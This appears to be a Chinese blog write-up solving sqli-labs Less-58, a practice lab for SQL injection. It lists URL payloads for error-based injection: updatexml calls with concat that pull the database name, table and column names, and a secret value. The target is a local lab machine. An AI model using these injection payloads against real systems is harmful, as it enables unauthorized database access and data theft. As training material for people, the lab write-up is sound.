【sqli-labs】 less58 GET -Challenge -Double Query -5 queries allowed -Variation1 (GET型 挑战 双查询 只允许5次查询 变化1)
2024-08-25 04:52:12
单引号闭合成功,但是union select结果不对
http://192.168.136.128/sqli-labs-master/Less-58/?id=0' union select 1,2,3%23
id='0'是不出结果的,那数据就不是从数据库取出的
http://192.168.136.128/sqli-labs-master/Less-58/?id=1'
但是有MYSQL的报错
那就用报错取数据
http://192.168.136.128/sqli-labs-master/Less-58/?id=1' or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-58/?id=1' or UpdateXml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-58/index.php?id=1' or UpdateXml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='SU6MJHL7WA'),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-58/index.php?id=1' or UpdateXml(1,concat(0x7e,(select secret_C3H8 from SU6MJHL7WA limit 0,1),0x7e),1)%23
完成
最新文章
- Leetcode 69. Sqrt(x)
- delayed ack与nagle's算法
- Spring Boot 1 创建Demo
- poi实现Excel比较
- ref和out的使用与区别
- SQL2008--行号的得到
- C++ socket开发1
- Maven浅析-2 什么是Maven
- jQuery学习笔记(一)——基础选择器、过滤选择器、表单选择器
- IS--A与 Has-a 区别
- Day01
- Chrome 小工具: 启动本地应用 (Native messaging)
- MPU9250九轴陀螺仪--连接MPU9250
- [20181109]12cR2 的pre_page_sga参数
- Java程序员必会英语单词
- iOS手机流量抓包rvictl
- mvc4 初体验(一)
- Android单例模式
- MySQL的btree索引和hash索引的区别 (转)
- [PPT] PPT 录制视频功能.